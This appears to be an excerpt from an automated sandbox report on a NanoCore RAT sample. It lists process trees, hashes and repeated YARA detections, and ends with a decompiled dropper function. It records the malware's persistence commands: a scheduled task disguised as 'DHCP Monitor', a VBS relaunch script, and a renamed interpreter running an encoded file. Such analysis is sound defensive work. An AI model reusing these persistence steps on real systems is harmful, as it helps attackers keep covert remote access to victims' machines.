              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x720000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, Author: Florian Roth
              Antivirus matches:
              • Detection: 0%, Metadefender, Browse
              • Detection: 0%, ReversingLabs
              Reputation:high

              Chronological Activities

              Analysis Process: schtasks.exe PID: 7124 Parent PID: 5792

              General

              Start time:12:34:36
              Start date:12/10/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'
              Imagebase:0xa10000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 6936 Parent PID: 7124

              General

              Start time:12:34:36
              Start date:12/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: schtasks.exe PID: 6760 Parent PID: 5792

              General

              Start time:12:34:37
              Start date:12/10/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp'
              Imagebase:0xa10000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: RegSvcs.exe PID: 6312 Parent PID: 664

              General

              Start time:12:34:37
              Start date:12/10/2021
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
              Imagebase:0x690000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 6580 Parent PID: 6760

              General

              Start time:12:34:37
              Start date:12/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: conhost.exe PID: 6560 Parent PID: 6312

              General

              Start time:12:34:37
              Start date:12/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: xmjk.pif PID: 6848 Parent PID: 3352

              General

              Start time:12:34:38
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):false
              Commandline:'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low

              Chronological Activities

              Analysis Process: dhcpmon.exe PID: 7096 Parent PID: 664

              General

              Start time:12:34:39
              Start date:12/10/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
              Imagebase:0x7f0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Antivirus matches:
              • Detection: 0%, Metadefender, Browse
              • Detection: 0%, ReversingLabs

              Chronological Activities

              Analysis Process: conhost.exe PID: 7112 Parent PID: 7096

              General

              Start time:12:34:40
              Start date:12/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Chronological Activities

              Analysis Process: xmjk.pif PID: 4356 Parent PID: 3352

              General

              Start time:12:34:41
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

              Chronological Activities

              Analysis Process: wscript.exe PID: 6420 Parent PID: 3352

              General

              Start time:12:34:48
              Start date:12/10/2021
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\31956653\Update.vbs'
              Imagebase:0x7ff752ac0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Chronological Activities

              Analysis Process: xmjk.pif PID: 4608 Parent PID: 6420

              General

              Start time:12:34:50
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):false
              Commandline:'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Chronological Activities

              Analysis Process: RegSvcs.exe PID: 5572 Parent PID: 4356

              General

              Start time:12:34:51
              Start date:12/10/2021
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x7f0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

              Chronological Activities

              Analysis Process: xmjk.pif PID: 3412 Parent PID: 6420

              General

              Start time:12:34:52
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

              Chronological Activities

              Disassembly

              Code Analysis

              Reset < >

                Analysis Process: dAkJsQr7A9.exe PID: 6308 Parent PID: 3652 dAkJsQr7A9.exeCOMMON

                Executed Functions

                Function 00CBCBB8, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 199filesleeptimeCOMMON
                Download Yara Rule
                C-Code - Quality: 17%
                			E00CBCBB8(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t95;
				struct HINSTANCE__* _t97;
				intOrPtr _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t125;

				_t125 = __fp0;
				_t89 = __edx;
				E00CAFD49(__edx, 1);
				E00CB95F8("C:\Users\hardz\Desktop", 0x800);
				E00CB9AA0( &_v208); // executed
				E00CB1017(0xce7370);
				_t74 = 0;
				E00CBE920(0x7104, 0xcf5d08, 0, 0x7104);
				_t106 = _t105 + 0xc;
				_t95 = GetCommandLineW();
				_t110 = _t95;
				if(_t95 != 0) {
					_push(_t95);
					E00CBB356(0, _t110);
					if( *0xce9601 == 0) {
						E00CBC891(__eflags, _t95); // executed
					} else {
						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t103 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t103);
					}
				}
				GetModuleFileNameW(_t74, 0xcfce18, 0x800);
